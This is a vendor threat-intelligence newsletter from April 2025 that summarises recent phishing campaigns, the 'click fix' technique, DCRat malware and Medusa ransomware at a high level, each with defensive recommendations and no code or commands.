Unit 42 Threat Bulletin - April 2025
By, Palo Alto Networks Unit 42
Unit 42 Threat Intelligence & Incident Response. Intelligence Driven. Response Ready.
Originally published on April 23, 2025.
Welcome back! Unit 42 is reviving our monthly Threat Bulletin newsletter. We’d love to hear your thoughts on the new look and feel. Drop a comment below and tell us what you think!
"Cybersecurity is not a cost center; it’s an investment in digital trust, the currency of the future."
- Richard Emerson, manager of reactive threat intelligence, Unit 42
Incident Response Highlight: What's Trending Right Now in Unit 42 Incident Response Investigations
Dark Scorpius Phishing Through Microsoft Teams
What's Happening:
- Consultants observed Dark Scorpius (distributors of Black Basta ransomware) targeting users via phishing through Microsoft Teams chat
Why It Matters:
- Social engineering tactics remain an effective method criminals use to target victims
- Ransomware attacks can cost millions of dollars, ruin an organization's reputation and cause great harm by releasing PII
Recommended Actions:
- Train employees regularly on recognizing social engineering tactics
- Training should go beyond written phishing tests to include recognition of callback phishing scams, deepfakes and other sophisticated tactics
- Learn more about common initial access vectors in our 2025 Unit 42 Global Incident Response Report
Spotlight Threat: Need-to-Know Threat Actor Activity
JavaGhost Uses Cloud Misconfigurations to Launch Phishing Attacks
What's Happening:
- JavaGhost targeted organizations’ misconfigured AWS environments by leveraging exposed credentials
- The group abused these environments to send phishing campaigns
- Unit 42 observed the use of advanced evasion methods to cover its tracks
Why It Matters:
- Abuse of your cloud environments for phishing could cause operational costs and reputational damage
Recommended Actions:
- Hunt within CloudTrail logs for detectable JavaGhost activity, as described in our full article
- Proactively create alerts based on these detectable events
TTP Breakdown: Unpacking the Latest Threat Actor Tactics, Techniques and Procedures
The Click Fix Method
What's Happening:
- “Click fix” refers to web pages that insert malicious script into the copy/paste buffer
- These pages show detailed instructions for victims to open a run window, paste the script into the window and run it
- Use of this method has increased since July 2024
- A form of the MITRE ATT&CK® technique User Execution (T1204)
Why It Matters:
- Threat actors can use the “click fix” method to circumvent protections organizations have implemented against other types of attacks, tricking victims into installing malicious programs themselves
Recommended Actions:
- Educate people to be cautious of unexpected website popups
- Watch for timely threat intelligence updates about this and other TTPs used in active campaigns, shared weekly through our social channels.
Quick Insights
Malware in Focus: DarkCrystalRAT
- First observed in 2018 when advertised on Russian underground forums
- Now commonly distributed and advertised through Telegram
- Often abbreviated as DCRat
- Written primarily in .NET and C#, targeting Windows operating systems
- Has a modular design and allows clients to develop and share custom plugins
Threat Actor in Focus: Transforming Scorpius
- Unit 42 designator for the group behind Medusa ransomware
- First appeared in late 2022
- Uses a ransomware-as-a-service (RaaS) model
- Maintains data leak site for extortion
Aggressively pursues revenue through:
- Ransom demands in the millions
- Fees for data deletion
- Fees for data download
- Fees for payment extensions
Get Ahead
Unit 42 Insider Threat Services help detect, deter, and disrupt malicious and accidental insider threats, leveraging our years of experience to ensure your organization remains resilient against internal risks.
Additional Insights and Must-Reads
Never miss out on new Unit 42 research. Subscribe to our Threat Research Center.
